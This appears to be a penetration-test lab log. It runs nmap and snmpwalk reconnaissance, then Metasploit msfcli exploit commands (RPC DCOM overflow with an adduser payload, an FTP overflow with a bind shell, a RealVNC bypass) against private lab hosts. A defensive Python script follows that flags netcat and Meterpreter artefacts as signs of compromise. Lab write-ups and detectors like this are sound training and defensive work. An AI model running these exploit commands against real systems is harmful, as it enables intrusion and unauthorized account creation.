- 1. Using nmap to gather information about 192.168.13.201. Obviously this server is getting a shit load of scanning, thus nmap sometimes reports that this server is down.
- 2. Previously gathered information shows that most Windows servers have port 135 enabled. Checking msfcli reveals the following:
- ./msfcli |grep windows -i|grep rpc -i
- exploit/windows/brightstor/mediasrv_sunrpc CA BrightStor ArcServe Media Service Stack Buffer Overflow
- exploit/windows/dcerpc/ms03_026_dcom Microsoft RPC DCOM Interface Overflow
- exploit/windows/dcerpc/ms05_017_msmq Microsoft Message Queueing Service Path Overflow
- exploit/windows/dcerpc/ms07_065_msmq Microsoft Message Queueing Service DNS Name Path Overflow
- exploit/windows/dcerpc/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
- exploit/windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
- exploit/windows/smb/netidentity_xtierrpcpipe Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.
- 3. Try the 2nd one - DCOM Interface Overflow:
- ./msfcli exploit/windows/dcerpc/ms03_026_dcom P
- ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser O
- ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 C
- 3.a This command responds that server 231 isn't supported.
- ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 E
- Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
- 3.b I ignore the failed check and go ahead to try to send the payload. Failed as expected. I do realize that in a real-life situation this would crash the server process, but with the lab servers being revertable I decided to go ahead.
- 4. Looking at the nmap results for other clues. I picked server 227; it seems to have lower versions of software.
- 5. An snmpwalk feels like the first choice. Results are in: 227_ports.log, 227_services.log, 227_software.log and 227_users.log.
- 6. The "nc.exe" service and port 4444 listening reveal that this server might have been compromised.
- 7. nc -vv 192.168.13.227 4444 returns a "connection refused" error. My guess is that somebody is having a remote shell? I should use other ports if I am getting a shell then.
- 8. 192.168.12.65 is the guy who is connecting to this port. He also connects to port 1352. No luck with nc on that port either.
- 9. The service metsvc.exe agrees that this is a compromised server running meterpreter.
- 10. The server name is in its NetBIOS, as SRV2.
- 11. Let's look at the M$ ESMTP service.
- ./msfcli |grep -i ESMTP - got nothing.
- 12. Looking at the ftpd service.
- ./msfcli exploit/windows/ftp/microsoft_ftpd_nlst PAYLOAD=windows/shell_bind_tcp FTPUSER=ftp FTPPASS=ftp@ftp.com RHOST=192.168.13.227 LPORT=4325 E
- 13. No luck: "550 GQCYLIOBRL: Access is denied." The root directory of the FTP server is not writeable. I might come back here when I have an account that has file system access.
- 14. Now try RealVNC. Apparently there is only one exploit and it's client side for the viewer, thus no luck either.
- 14b. Well, it appears that MSF2 has something special for RealVNC... realvnc_41_bypass
- ./msfcli realvnc_41_bypass LHOST=127.0.0.1 RHOST=192.168.13.227 RPORT=5900 E
- Why does LHOST have to be 127.0.0.1?? But after the TightVNC viewer shows up, Windows asks for a password to log in again...
- 15. Found two exploits for port 135:
- http://www.metasploit.com/modules/exploit/windows/dcerpc/ms03_026_dcom
- payload can be sent without any responses. Adduser payload failed.
- 16. Using nmap to banner-grab the ports from snmpwalk one by one, discovered the web service at http://192.168.13.227:6532, but it is limited to certain IP addresses.
- 17. Try IIS 5.0 exploits in MSF2 and MSF3, countless fails.
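Items 6 and 9 above reach the "this host is already compromised" conclusion by correlating two artefacts from the snmpwalk output: an nc.exe process with a listener on TCP 4444, and the metsvc.exe service. The following is an added example (it is not from the paste, and the inventory format and the 192.168.13.228 control host are constructed) that turns that reasoning into a reusable defensive triage check over a host's process and listener inventory, escalating severity only when two independent indicators agree on the same host, as the log does.

```python
"""Defender-side triage of a process/listener inventory for the artefacts
noted in the paste (nc.exe, metsvc.exe, a TCP 4444 listener).
Added example; the input shape below is constructed to resemble a flattened
hrSWRunName / tcpConnTable dump and is not a real snmpwalk format."""
import re
from dataclasses import dataclass

# Indicators taken from items 6 and 9 of the log (assumed list, extend as needed).
SUSPICIOUS_PROCESSES = {
    "nc.exe": "netcat running as a service",
    "metsvc.exe": "Meterpreter service binary",
}
SUSPICIOUS_PORTS = {4444: "default Metasploit handler port"}


@dataclass
class Finding:
    host: str
    evidence: str
    reason: str
    severity: str  # "medium" for a lone indicator, "high" when two or more agree


# Constructed sample inventory: one line per process or per TCP listener.
SAMPLE = """\
host=192.168.13.227 proc=svchost.exe
host=192.168.13.227 proc=nc.exe
host=192.168.13.227 proc=metsvc.exe
host=192.168.13.227 listen=tcp/4444
host=192.168.13.227 listen=tcp/1352
host=192.168.13.228 proc=svchost.exe
host=192.168.13.228 listen=tcp/135
"""

LINE_RE = re.compile(r"host=(\S+)\s+(proc|listen)=(\S+)")


def parse_inventory(text):
    """Return {host: {"procs": set of names, "ports": set of ints}}."""
    inv = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the expected shape
        host, kind, value = m.groups()
        entry = inv.setdefault(host, {"procs": set(), "ports": set()})
        if kind == "proc":
            entry["procs"].add(value.lower())
        else:
            _proto, _, port = value.partition("/")
            if port.isdigit():
                entry["ports"].add(int(port))
    return inv


def triage(text):
    """Flag hosts whose inventory matches the indicators; escalate on agreement."""
    findings = []
    for host, entry in parse_inventory(text).items():
        host_findings = []
        for proc in sorted(entry["procs"]):
            if proc in SUSPICIOUS_PROCESSES:
                host_findings.append(
                    Finding(host, f"process {proc}", SUSPICIOUS_PROCESSES[proc], "medium"))
        for port in sorted(entry["ports"]):
            if port in SUSPICIOUS_PORTS:
                host_findings.append(
                    Finding(host, f"listener tcp/{port}", SUSPICIOUS_PORTS[port], "medium"))
        # Two independent indicators on one host: the log treats this as confirmed.
        if len(host_findings) >= 2:
            for f in host_findings:
                f.severity = "high"
        findings.extend(host_findings)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.host}: {f.evidence} ({f.reason}) -> {f.severity}")
```

The lone port 1352 listener is deliberately not flagged: the log records it only as a second connection from 192.168.12.65, and a port number on its own is weak evidence, so it stays out of the indicator table rather than generating noise.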